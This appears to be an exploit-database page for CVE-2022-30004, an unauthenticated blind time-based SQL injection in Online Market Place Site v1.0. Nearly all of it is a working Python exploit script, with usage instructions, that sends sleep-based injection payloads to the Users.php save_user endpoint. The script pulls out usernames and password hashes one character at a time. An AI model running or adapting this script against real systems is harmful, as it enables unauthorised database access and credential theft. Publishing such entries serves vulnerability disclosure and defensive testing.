Online Market Place Site 1.0 SQL Injection

2022.09.06
Credit: Joe Pollock
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2022-30004
CWE: CWE-89

# Exploit Title: Online Market Place Site v1.0 - Unauthenticated Blind Time-Based SQL Injection # Exploit Author: Joe Pollock # Date: September 03, 2022 # Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip # Tested on: Kali Linux, Apache, Mysql # CVE: CVE-2022-30004 (RESERVED) # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # Online Market Place Site v1.0 suffers from an unauthenticated blind SQL Injection Vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection. # This script will retrieve a single username and associciated password hash from the omps_db database via blind, time-based SQL injection. # By default, the username & hash retrieved will have an ID equal to zero in the database, i.e. the first username and password hash. # Default behavior can be changed by setting the USERID variable. Sleep timings may also have to be adjusted to account for network latency. # Ex: python3 omps.py 10.14.14.2 import sys, requests, urllib3 USERID=0 def main(): if len(sys.argv) != 2: print("(+) usage: %s <target>") % sys.argv[0] print('(+) eg: %s 192.168.121.103') % sys.argv[0] sys.exit(-1) ip = sys.argv[1] print("(+) Retrieving username and hash...") target = "http://%s/omps/classes/Users.php?f=save_user" % ip # Get username for p in range (1,30): injection_string = "AAAA' OR IF(ascii(MID((select username from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p) for c in range(32, 126): files = {"username": (None, injection_string.replace("[CHAR]", str(c)))} #print(injection_string.replace("[CHAR]", str(c))) r = requests.post(target, files=files) if (r.elapsed.total_seconds() > 2): extracted_char = chr(c) sys.stdout.write(extracted_char) sys.stdout.flush() sys.stdout.write("\t") # Get password hash for p in range (1,65): injection_string = "AAAA' OR IF(ascii(MID((select password from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p) for c in range(32, 126): files = {"username": (None, injection_string.replace("[CHAR]", str(c)))} #print(injection_string.replace("[CHAR]", str(c))) r = requests.post(target, files=files) if (r.elapsed.total_seconds() > 2): extracted_char = chr(c) sys.stdout.write(extracted_char) sys.stdout.flush() print("\n(+) done!") if __name__ == "__main__": main()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top